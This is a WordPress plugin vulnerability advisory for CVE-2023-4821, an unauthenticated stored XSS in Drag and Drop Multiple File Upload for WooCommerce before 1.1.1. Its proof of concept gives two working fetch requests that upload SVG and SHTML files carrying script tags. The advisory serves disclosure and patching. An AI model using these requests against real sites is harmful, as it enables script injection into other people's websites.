WordPress Plugin Vulnerabilities

Drag and Drop Multiple File Upload < 1.1.1 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not filter all potentially dangerous file extensions. Therefore, an attacker can upload unsafe .shtml or .svg files containing malicious scripts.

Proof of Concept

# Using malicious SVG files:

Go to a product page that features the file upload form, and paste the following in your browser console:

```
fetch("/wp-admin/admin-ajax.php", {
    "credentials": "omit",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656"
    },
    "referrer": "http://wpscan-vulnerability-test-bench.ddev.site/product/catapult/",
    "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|svg\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.svg\"\r\nContent-Type: image/jpeg\r\n\r\n<?xml version=\"1.0\" standalone=\"no\"?><!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"><svg version=\"1.1\" baseProfile=\"full\" xmlns=\"http://www.w3.org/2000/svg\"><polygon id=\"triangle\" points=\"0,0 0,50 50,0\" fill=\"#009900\" stroke=\"#004400\"/><script type=\"text/javascript\">alert(\"XSS\");</script></svg>\n\r\n-----------------------------4807439943981355138852449656--\r\n`,
    "method": "POST",
    "mode": "cors"
}).then(x=>x.text()).then(x=>console.log(x));
```

You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.svg


# Using malicious SHTML files:

Go to a product page that features the file upload form, and paste the following in your browser console:

```
fetch("/wp-admin/admin-ajax.php", {
    "credentials": "omit",
    "headers": {
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656"
    },
    "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|shtml\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.shtml\"\r\nContent-Type: image/jpeg\r\n\r\n<script>alert(1);</script>\n\r\n-----------------------------4807439943981355138852449656--\r\n`,
    "method": "POST",
    "mode": "cors"
}).then(x=>x.text()).then(x=>console.log(x));
```

You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.shtml

Affects Plugins

Plugin icon
drag-and-drop-multiple-file-upload-for-woocommerce
Fixed in 1.1.1

References

CVE
CVE-2023-4821

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Zeyad Alshahrani
Submitter
Zeyad Alshahrani
Submitter website
https://3n1gma.sh/
Verified
Yes
WPVDB ID
3ac0853b-03f7-44b9-aa9b-72df3e01a9b5

Timeline

Publicly Published
2023-09-21 (about 7 months ago)
Added
2023-09-21 (about 7 months ago)
Last Updated
2023-09-21 (about 7 months ago)

Other

Published
Title
Published
2024-02-12
Title
Livemesh Addons for Elementor < 8.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via animated_text_class
Published
2023-08-30
Title
NotifyVisitors <= 1.0 - Admin+ Stored XSS
Published
2021-01-28
Title
Formidable Form Builder < 4.09.05 - Unauthenticated Stored Cross-Site Scripting
Published
2023-10-22
Title
Tab Ultimate < 1.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Published
2023-02-02
Title
Multi-column Tag Map < 17.0.25 - Contributor+ Stored XSS